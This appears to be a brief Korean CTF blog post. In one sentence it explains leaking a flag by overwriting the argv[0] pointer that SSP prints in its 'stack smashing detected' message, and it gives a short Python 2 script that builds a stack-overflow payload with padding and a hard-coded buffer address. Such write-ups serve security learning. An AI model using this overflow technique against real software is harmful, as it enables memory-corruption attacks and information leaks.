SSP에서 stack smashing detected 뒤에 나오는 argv[0]포인터를 FLAG 버퍼로 변조하면 된다

1
2
3
4
5
6
7
8
9
10
11
12
sc = "kk\n"
sc +="A"*384+"\n"
sc +="A"*383+"\n"
sc +="A"*382+"\n"
sc +="A"*381+"\n"
sc +="A"*380+"\n"
sc +="A"*379+"\n"
sc +="A"*378+"\n"
sc +="A"*377+"\n"
sc +="A"*376+"\xc0\x10\x60\x00\n"
sc +="yes\na\n"
print sc
cs


'CTF' 카테고리의 다른 글

codegate 2017  (0) 2017.02.11
SECCON_2016 logger  (0) 2016.12.14
SECCON_2016 cheer  (0) 2016.12.11
SECCON_2016 jmper  (0) 2016.12.11

+ Recent posts